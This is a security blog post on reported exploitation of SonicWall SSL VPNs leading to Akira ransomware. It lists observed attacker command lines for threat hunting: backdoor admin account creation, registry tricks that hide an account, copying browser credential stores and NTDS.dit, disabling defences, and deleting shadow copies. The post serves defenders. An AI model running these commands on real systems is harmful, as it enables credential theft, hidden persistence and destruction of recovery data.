SonicWall VPN Zero-Day Exploited: Attackers Bypass MFA and Deploy Ransomware

A critical zero-day in SonicWall SSL VPNs is enabling rapid domain-wide ransomware attacks—even against networks with MFA. Here’s what’s happening, how attackers operate, and what urgent steps you should take.

Saiprashanth Pulisetti

8/5/20252 min read

The Threat: Fast, Sophisticated, Ongoing

Security teams, including Huntress, are witnessing a wave of intrusions leveraging a likely SonicWall zero-day. Attackers are reliably bypassing MFA and, within hours, moving laterally to compromise domain controllers and launch ransomware. These attacks are targeting SonicWall TZ and NSa-series appliances with SSLVPN enabled and running firmware versions 7.2.0-7015 or earlier

The Attack Chain: From Appliance Breach to Ransomware

After exploiting the SonicWall device—even with MFA—the attackers:

  • Abuse over-privileged accounts (e.g., sonicwall, LDAPAdmin)

  • Deploy backdoors like Cloudflared tunnels, OpenSSH, and remote management tools (AnyDesk, ScreenConnect)

  • Move laterally through PowerShell Remoting, WMI, and tooling

  • Steal credentials—dumping Veeam, Active Directory data

  • Disable defenses—turning off Windows Defender, firewall, and erasing recovery backups

  • Deploy ransomware (Akira), causing enterprise-wide disruption

Real-World Commands: What Attackers Are Running

Here’s a selection of the tools, tactics, and actual command lines observed in these attacks. Security teams should search endpoints and logs for these patterns:

Enumeration and Reconnaissance

"C:\Users\[redacted]\Downloads\Advanced_IP_Scanner_2.5.4594.1.exe"
"C:\[redacted]\netscan\netscan.exe"
"C:\Windows\system32\nltest.exe" /trusted_domains
"C:\Windows\system32\PING.EXE" 192.168.xx.xxx
"C:\Windows\system32\nltest.exe" /dclist:
"C:\Users\[redacted]\Documents\Advanced_Port_Scanner_2.5.3869.exe"
Install-WindowsFeature RSAT-AD-PowerShell
Get-ADComputer -Filter -Property | Select-Object Enabled, DNSHostName, IPv4Address, OperatingSystem, Description > C:\programdata\[redacted].txt
cmd.exe /Q /c nltest /domain_trusts 1> \\Windows\\Temp\\ysKBfL 2>&1
cmd.exe /Q /c quser 1> \\127.0.0.1\ADMIN$\__1754125023.3698354 2>&1
net group "Domain admins" /domain


Staging, Exfiltration, and Tool Usage
"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- . X:\[Redacted]
C:\ProgramData\shares.txt
"C:\Program Files\FileZilla FTP Client\fzsftp.exe" -v

Persistence and Privilege Escalation

"C:\Windows\System32\msiexec.exe" /i "C:\ProgramData\OpenSSHa.msi"
"C:\Windows\system32\net.exe" user lockadmin Msnc?42da /add
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v commuser /d 0 /f
net user [REDACTED] VRT83g$%ce /add
net localgroup Administrators [redacted] /add
net localgroup "Remote Desktop Users" [redacted] /add
net group "Domain Admins" azuresync /add
cmd.exe /Q /c net user backupSQL Password123$ /add /dom 1> \\Windows\\Temp\\tinhLg 2>&1
cmd.exe /Q /c net group "Domain Admins" backupSQL /dom /add 1> \Windows\Temp\NDqyOI 2>&1

Credential Theft and Lateral Movement

cmd.exe /Q /c copy "C:\Users\[redacted]\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Windows\Temp\1753954887.8450267"
"C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SECURITY -quiet

Evasion and Security Disabling

"C:\Windows\system32\SystemSettingsAdminFlows.exe" Defender DisableEnhancedNotifications 1
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22

Recovery Prevention and Ransomware Execution

"C:\WINDOWS\system32\vssadmin.exe" delete shadows /all /quiet
w.exe -p=\\[redacted]\C$ -n=1

What You Should Do Right Now
  • Disable SonicWall SSL VPN immediately if possible

  • If you can’t, restrict access by IP allow-list and segment critical systems

  • Audit service accounts—especially those used by SonicWall devices; remove excessive privileges

  • Hunt for these command lines and processes in your logs, EDR, and SIEM tools

  • Review for attacker-created accounts like lockadmin, backupSQL, and suspicious new administrative groups

See the full technical write-up and complete investigation here:
https://www.huntress.com/blog/exploitation-of-sonicwall-vpn?utm_source=linkedin&utm_medium=social&utm_campaign=cy25-08-rr-multi-global-broad-all-sonicwall_vpn

Stay vigilant. Time is of the essence when these attacks land—and every minute counts.

For all details, IOCs, and updated incident response techniques, see: Active Exploitation of SonicWall VPNs | Huntress